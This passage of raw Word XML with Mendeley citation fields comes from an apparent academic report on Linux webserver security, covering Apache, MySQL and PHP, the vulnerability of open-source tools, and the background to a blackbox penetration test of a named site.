Foundation","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=48058420-f885-4b9b-bbcc-683e6a4d7091"]}],"mendeley":{"formattedCitation":"[44]","plainTextFormattedCitation":"[44]","previouslyFormattedCitation":"[44]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007D5F13" w:rsidRPr="007D5F13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[44]</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9780596007249","abstract":"Published March 2005, 420 pages. SUMMARY: With more than 67% of web servers running Apache, it is by far the most widely used web server platform in the world. Apache has evolved into a powerful system that easily rivals other HTTP servers in terms of functionality, efficiency, and speed. Despite these impressive capabilities, though, Apache is only a beneficial tool if it's a secure one. To be sure, administrators installing and configuring Apache still need a sure-fire way to secure it-whether it's running a huge e-commerce operation, corporate intranet, or just a small hobby site. Our new guide, \"Apache Security,\" gives administrators and webmasters just what they crave-a comprehensive security source for Apache. Successfully combining Apache administration and web security topics, \"Apache Security\" speaks to nearly everyone in the field. What's more, it offers a concise introduction to the theory of securing Apache, as well as a broad perspective on server security in general. But this book isn't just about theory. The real strength of \"Apache Security\" lies in its wealth of interesting and practical advice, with many real-life examples and solutions. Administrators and programmers will learn how to: install and configure Apache prevent denial of service (DoS) and other attacks securely share servers control logging and monitoring secure custom-written web applications conduct a web security assessment use modsecurity and other security-related modules And that's just the tip of the iceberg, as mainstream Apache users will also gain valuable information on PHP and SSL/ TLS. Clearly, \"Apache Security\" is packed and to the point, with plenty of details for locking down this extremely popular and versatile web server.","author":[{"dropping-particle":"","family":"Ristic","given":"Ivan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Apache Security","id":"ITEM-1","issued":{"date-parts":[["2005"]]},"title":"Apache Security","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=058b7a99-4658-4d5b-9d3b-951cc981481e"]}],"mendeley":{"formattedCitation":"[45]","plainTextFormattedCitation":"[45]","previouslyFormattedCitation":"[45]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007D5F13" w:rsidRPr="007D5F13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>, MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00B17D2D">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"This is the MySQL™ Reference Manual. It documents MySQL 5.7 through 5.7.11. MySQL Cluster is currently not supported in MySQL 5.7. For information about MySQL Cluster, please see MySQL Cluster NDB 7.3 and MySQL Cluster NDB 7.4. MySQL 5.7 features. This manual describes features that are not included in every edition of MySQL 5.7; such features may not be included in the edition of MySQL 5.7 licensed to you. If you have any questions about the features included in your edition of MySQL 5.7, refer to your MySQL 5.7 license agreement or contact your Oracle sales representative.","author":[{"dropping-particle":"","family":"MySQL","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"MySQL 5.7 Reference Manual","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"MySQL 5.7 Reference Manual","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=4080341e-eab9-4db6-8cdc-faaabe77fade"]}],"mendeley":{"formattedCitation":"[46]","plainTextFormattedCitation":"[46]","previouslyFormattedCitation":"[46]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007D5F13" w:rsidRPr="007D5F13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[46]</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>, PHP</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="007423BC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1201/b18327-18","abstract":"Being highly flexible in building dynamic, database-driven web applications makes the PHP programming language one of the most popular web development tools in use today. It also works beautifully with other open source tools, such as the MySQL database and the Apache web server. However, as more web sites are developed in PHP, they become targets for malicious attackers, and developers need to prepare for the attacks. Security is an issue that demands attention, given the growing frequency of attacks on web sites. Essential PHP Security explains the most common types of attacks and how to write code that isn't susceptible to them. By examining specific attacks and the techniques used to protect against them, you will have a deeper understanding and appreciation of the safeguards you are about to learn in this book. In the much-needed (and highly-requested) Essential PHP Security, each chapter covers an aspect of a web application (such as form processing, database programming, session management, and authentication). Chapters describe potential attacks with examples and then explain techniques to help you prevent those attacks. Topics covered include: Preventing cross-site scripting (XSS) vulnerabilities Protecting against SQL injection attacks Complicating session hijacking attempts You are in good hands with author Chris Shiflett, an internationally-recognized expert in the field of PHP security. Shiflett is also the founder and President of Brain Bulb, a PHP consultancy that offers a variety of services to clients around the world.","author":[{"dropping-particle":"","family":"Wu","given":"Hanqing","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao","given":"Liz","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Web Security","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"PHP Security","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=6896f830-9139-4374-91f3-17cff23054e2"]}],"mendeley":{"formattedCitation":"[47]","plainTextFormattedCitation":"[47]","previouslyFormattedCitation":"[47]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007D5F13" w:rsidRPr="007D5F13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[47]</w:t>
      </w:r>
      <w:r w:rsidR="007D5F13">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008F6FEF">
        <w:t xml:space="preserve"> website scripting language</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>/framework</w:t>
      </w:r>
      <w:r w:rsidR="001C388D">
        <w:t xml:space="preserve"> along with E-Mail servers</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve">and many more tools that are </w:t>
      </w:r>
      <w:r w:rsidR="003C3EB9">
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> to host and deploy website</w:t>
      </w:r>
      <w:r w:rsidR="00BD0E93">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t xml:space="preserve"> services to customers via the Internet.</w:t>
      </w:r>
      <w:r w:rsidR="004F0CA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83DAEF" w14:textId="2A824E1C" w:rsidR="00244FB3" w:rsidRDefault="004F0CA1" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The majority of these tools/applications are created by the open source Linux community that create software for free, this often leads to a lack of quality control security measures that are employed by most software companies to harden the security of their product, which subsequently leads to many vulnerabilities within open source application code that may take many months or even years to be patched </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t xml:space="preserve">due to the lack of funding for open source Linux projects and applications, </w:t>
      </w:r>
      <w:r>
        <w:t>leaving a lot of open source Linux webservers that utilise these tools  vulnerable to attack.</w:t>
      </w:r>
      <w:r w:rsidR="007423BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007423BC">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="000F6C2E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1017/CBO9781107415324.004","ISBN":"9788578110796","ISSN":"19454589","PMID":"25246403","abstract":"In Penetration Testing, security researcher and trainer Georgia Weidman provides you with a survey of important skills that any aspiring pentester needs. This beginner-friendly book opens with some basics of programming and helps you navigate Kali Linux, an operating system that comes preloaded with useful computer security tools like Wireshark and Metasploit. You'll learn about gathering information on a target, social engineering, capturing network traffic, analyzing vulnerabilities, developing exploits, and more. Hands-on examples discuss even advanced topics like mobile device security and bypassing anti-virus software.","author":[{"dropping-particle":"","family":"Weidman","given":"Georgia","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"No Starch Press","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"Penetration Testing: A Hands-On Introduction to Hacking","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=b898e1ff-12b4-496f-9c55-14335b2e0b40"]},{"id":"ITEM-2","itemData":{"DOI":"10.1036/0072262575","ISBN":"0071596429","ISSN":"1098-6596","PMID":"25246403","abstract":"The Latest Linux Security Solutions This authoritative guide will help you secure your Linux network--whether you use Linux as a desktop OS, for Internet services, for telecommunications, or for wireless services. Completely rewritten the ISECOM way, Hacking Exposed Linux, Third Edition provides the most up-to-date coverage available from a large team of topic-focused experts. The book is based on the latest ISECOM security research and shows you, in full detail, how to lock out intruders and defend your Linux systems against catastrophic attacks. Secure Linux by using attacks and countermeasures from the latest OSSTMM research Follow attack techniques of PSTN, ISDN, and PSDN over Linux Harden VoIP, Bluetooth, RF, RFID, and IR devices on Linux Block Linux signal jamming, cloning, and eavesdropping attacks Apply Trusted Computing and cryptography tools for your best defense Fix vulnerabilities in DNS, SMTP, and Web 2.0 services Prevent SPAM, Trojan, phishing, DoS, and DDoS exploits Find and repair errors in C code with static analysis and Hoare Logic","author":[{"dropping-particle":"","family":"Conover","given":"Matthew","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Hacking","id":"ITEM-2","issued":{"date-parts":[["2008"]]},"number-of-pages":"649","title":"Hacking Exposed Linux : Linux Security Secrets and Solutions, Third Edition","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=d311dcf3-525b-4a11-8021-cf7b8e8126f9"]},{"id":"ITEM-3","itemData":{"DOI":"10.1147/sj.403.0769","ISBN":"0018-8670","ISSN":"0018-8670","abstract":"The explosive growth of the Internet has brought many good things: electronic commerce, easy access to vast stores of reference material, collaborative computing, e-mail, and new avenues for advertising and information distribution, to name a few. As with most technological advances, there is also a dark side: criminal hackers. Governments, companies, and private citizens around the world are anxious to be a part of this revolution, but they are afraid that some hacker will break into their Web server and replace their logo with pornography, read their e-mail, steal their credit card number from an on-line shopping site, or implant software that will secretly transmit their organization's secrets to the open Internet. With these concerns and others, the ethical hacker can help. This paper describes ethical hackers: their skills, their attitudes, and how they go about helping their customers find and plug up security holes. The ethical hacking process is explained, along with many of the problems that the Global Security Analysis Lab has seen during its early years of ethical hacking for IBM clients.","author":[{"dropping-particle":"","family":"Palmer","given":"C. C.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IBM Systems Journal","id":"ITEM-3","issue":"3","issued":{"date-parts":[["2001"]]},"page":"769-780","title":"Ethical hacking","type":"article-journal","volume":"40"},"uris":["http://www.mendeley.com/documents/?uuid=6176d42e-6f8a-41cd-8626-51f755e9699f"]}],"mendeley":{"formattedCitation":"[41], [48], [49]","plainTextFormattedCitation":"[41], [48], [49]","previouslyFormattedCitation":"[41], [48], [49]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007423BC">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007423BC" w:rsidRPr="007423BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[41], [48], [49]</w:t>
      </w:r>
      <w:r w:rsidR="007423BC">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="465807E1" w14:textId="3AE88FC5" w:rsidR="00D7468A" w:rsidRDefault="00F2598E" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>These</w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t xml:space="preserve"> applications are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t>the most vulnerable to attack from malicious actors when not</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t xml:space="preserve"> configure</w:t>
      </w:r>
      <w:r w:rsidR="001076BC">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t xml:space="preserve"> correctly</w:t>
      </w:r>
      <w:r w:rsidR="00BA593C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A95E87">
        <w:t>sandbox</w:t>
      </w:r>
      <w:r w:rsidR="00BA593C">
        <w:t xml:space="preserve"> tested</w:t>
      </w:r>
      <w:r w:rsidR="000F6C2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F6C2E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.2197/ipsjjip.19.153","ISSN":"18826652","abstract":"The use of public Malware Sandbox Analysis Systems (public MSASs) which receive online submissions of possibly malicious files or URLs from an arbitrary user, analyze their behavior by executing or visiting them by a testing environment (i.e., a sandbox), and send analysis reports back to the user, has increased in popularity. Consequently, anti-analysis techniques have also evolved from known technologies like anti-virtualization and anti-debugging to the detection of specific sandboxes by checking their unique characteristics such as a product ID of their OS and a usage of certain Dynamic Link Library (DLL) used in a particular sandbox. In this paper, we point out yet another important characteristic of the sandboxes, namely, their IP addresses. In public MSASs, the sandbox is often connected to the Internetin order to properly observe malware behavior as modern malware communicate with remote hosts in the Internet for various reasons, such as receiving command and control (C&amp;C) messages and files for updates. We explain and demonstrate that the IP address of an Internet-connected sandbox can be easily disclosed by an attacker who submits a decoy sample dedicated to this purpose. The disclosed address can then be shared among attackers, blacklisted, and used against the analysis system, for example, to conceal potential malicious behavior of malware. We call the method Network-based Sandbox Detection by Decoy Injection (NSDI). We conducted case studies with 15 representative existing public MSASs, which were selected from 33 online malware analysis systems with careful screening processes, and confirmed that a hidden behavior of the malware samples was successfully concealed from all of the 15 analysis systems by NSDI. In addition, we found out the risk that a background analysis activity behind these systems can also be revealed by NSDI if the samples are shared among the systems without careful considerations. Moreover, about three months after our first case study it was reported that a real-world NSDI was conducted against several public MSASs.","author":[{"dropping-particle":"","family":"Yoshioka","given":"Katsunari","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hosobuchi","given":"Yoshihiko","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Orii","given":"Tatsunori","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Matsumoto","given":"Tsutomu","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Journal of Information Processing","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Your sandbox is blinded: Impact of decoy injection to public malware analysis systems","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=0e40c4e9-4015-43b1-a526-946e1526bc2a"]}],"mendeley":{"formattedCitation":"[50]","plainTextFormattedCitation":"[50]","previouslyFormattedCitation":"[50]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="000F6C2E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F6C2E" w:rsidRPr="000F6C2E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[50]</w:t>
      </w:r>
      <w:r w:rsidR="000F6C2E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006F5A85">
        <w:t xml:space="preserve"> and updated/patched frequently</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by systems engineers</w:t>
      </w:r>
      <w:r w:rsidR="006F5A85">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t xml:space="preserve"> because of the commonality of their use within the webserver industry, a lot of focus has been </w:t>
      </w:r>
      <w:r w:rsidR="001076BC">
        <w:t>placed</w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t xml:space="preserve"> into exploiting these application services</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t xml:space="preserve"> by malicious actors</w:t>
      </w:r>
      <w:r w:rsidR="006F5A85">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="001076BC">
        <w:t xml:space="preserve">gain unauthorised access to sensitive information stored within a website backend database </w:t>
      </w:r>
      <w:r w:rsidR="007A5185">
        <w:t xml:space="preserve"> for monetary gain.</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BEE39" w14:textId="7AA74C78" w:rsidR="00CA4048" w:rsidRDefault="00E95B06" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> the focus of this research will be within Linux webservers and </w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> open source </w:t>
      </w:r>
      <w:r>
        <w:t>applications, as</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> the majority market share within the webserver market as previously discussed</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Furthermore,</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> the target for the Blackbox penetration test </w:t>
      </w:r>
      <w:r w:rsidR="00D7468A" w:rsidRPr="00D7468A">
        <w:t>www.tevelcyber.com</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> is known to be hosted within a CSP that utilise</w:t>
      </w:r>
      <w:r w:rsidR="00F07326">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t xml:space="preserve"> Linux OS as their base OS</w:t>
      </w:r>
      <w:r w:rsidR="00F07326">
        <w:t xml:space="preserve"> VM</w:t>
      </w:r>
      <w:r w:rsidR="00D7468A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD515F" w14:textId="4593D5D1" w:rsidR="00F876CA" w:rsidRDefault="00F876CA" w:rsidP="00F876CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc40134034"/>
      <w:r>
        <w:t>2.2.1 Linux Webserver Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="340B0778" w14:textId="25A5DE8E" w:rsidR="008A66D4" w:rsidRPr="003153F7" w:rsidRDefault="00D66503" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Linux Apache webserver is the most widely utilsed and efficient webserver within the networking industry, although it is considered more secure than the </w:t>
      </w:r>
      <w:r w:rsidR="00AB7DF5">
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="000D2880" w:rsidRPr="000D2880">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D2880">
        <w:t>webserver</w:t>
      </w:r>
      <w:r w:rsidR="00AB7DF5">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Internet Information Server (IIS)</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://support.microsoft.com/en-us/help/324069/how-to-set-up-an-https-service-in-iis","abstract":"HTTPS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accessed":{"date-parts":[["2017","12","11"]]},"author":[{"dropping-particle":"","family":"Microsoft","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"microsoft.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"How To Set Up an HTTPS Service in IIS","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=fe4fcacb-4ed4-30b1-a157-d403de3d7328"]},{"id":"ITEM-2","itemData":{"DOI":"10.3139/9783446459236.058","abstract":"Home : The Official Microsoft IIS Site","author":[{"dropping-particle":"","family":"Schwichtenberg","given":"Holger","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Schwichtenberg","given":"Holger","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Windows PowerShell 5.1 und PowerShell Core 6.1","id":"ITEM-2","issued":{"date-parts":[["2019"]]},"title":"Internet Information Services (IIS)","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=bfde0142-44c8-4fc8-9741-51c707d4ff24"]}],"mendeley":{"formattedCitation":"[51], [52]","plainTextFormattedCitation":"[51], [52]","previouslyFormattedCitation":"[51], [52]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00535276" w:rsidRPr="00535276">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[51], [52]</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, many vulnerabilities have been found by network security researchers </w:t>
      </w:r>
      <w:r w:rsidR="00AB7DF5">
        <w:t xml:space="preserve">since its </w:t>
      </w:r>
      <w:r w:rsidR="003F59BA">
        <w:t>inception</w:t>
      </w:r>
      <w:r w:rsidR="00AB7DF5">
        <w:t xml:space="preserve"> in 19</w:t>
      </w:r>
      <w:r w:rsidR="00252940">
        <w:t>95</w:t>
      </w:r>
      <w:r w:rsidR="00BC75DC">
        <w:t>, that have been recorded within the global Common</w:t>
      </w:r>
      <w:r w:rsidR="00BC75DC" w:rsidRPr="008A66D4">
        <w:t xml:space="preserve"> Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r w:rsidR="00BC75DC">
        <w:t xml:space="preserve"> (CVE)</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/0272-7757(91)90035-N","ISBN":"0870142186","ISSN":"02727757","abstract":"MAIN MESSAGE: we don't really know any systematic and robust POLICY determinant of education quality! There is no consisten link between resources (i.e. school inputs) and outcomes. Major implication: the provision of schooling is very inefficient. HOWEVER: we know that there are huge differences in teacher quality - students of \"good\" teachers have perform better in standardized tests. But: we don't know what determines teacher quality. OTHER INSIGHTS: (1) nice description of the theoretical rationale for the idea of an \"education production function\". (2) nice review of the major methodological problems involved in estimating the relationship between school resources and educational quality.","author":[{"dropping-particle":"","family":"MITRE","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Common Vulnerabilities and Exposures","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"CVE - Common Vulnerabilities and Exposures","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=98b05cfd-7ad4-4372-a65e-5226d90a58a9"]}],"mendeley":{"formattedCitation":"[53]","plainTextFormattedCitation":"[53]","previouslyFormattedCitation":"[53]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00535276" w:rsidRPr="00535276">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[53]</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BC75DC">
        <w:t xml:space="preserve"> security</w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00BC75DC">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:t xml:space="preserve"> that contains a list of all known software/network security vulnerabilities reported by security researchers around the globe</w:t>
      </w:r>
      <w:r w:rsidR="00BC75DC">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="00252940">
        <w:t xml:space="preserve">he current stable release </w:t>
      </w:r>
      <w:r w:rsidR="00BC75DC">
        <w:t xml:space="preserve">of Apache </w:t>
      </w:r>
      <w:r w:rsidR="00252940">
        <w:t>as of March 26</w:t>
      </w:r>
      <w:r w:rsidR="00252940" w:rsidRPr="00252940">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00252940">
        <w:t xml:space="preserve"> 2020 is version </w:t>
      </w:r>
      <w:r w:rsidR="00252940" w:rsidRPr="00252940">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>2.4.43</w:t>
      </w:r>
      <w:r w:rsidR="00252940">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB7DF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00535276">
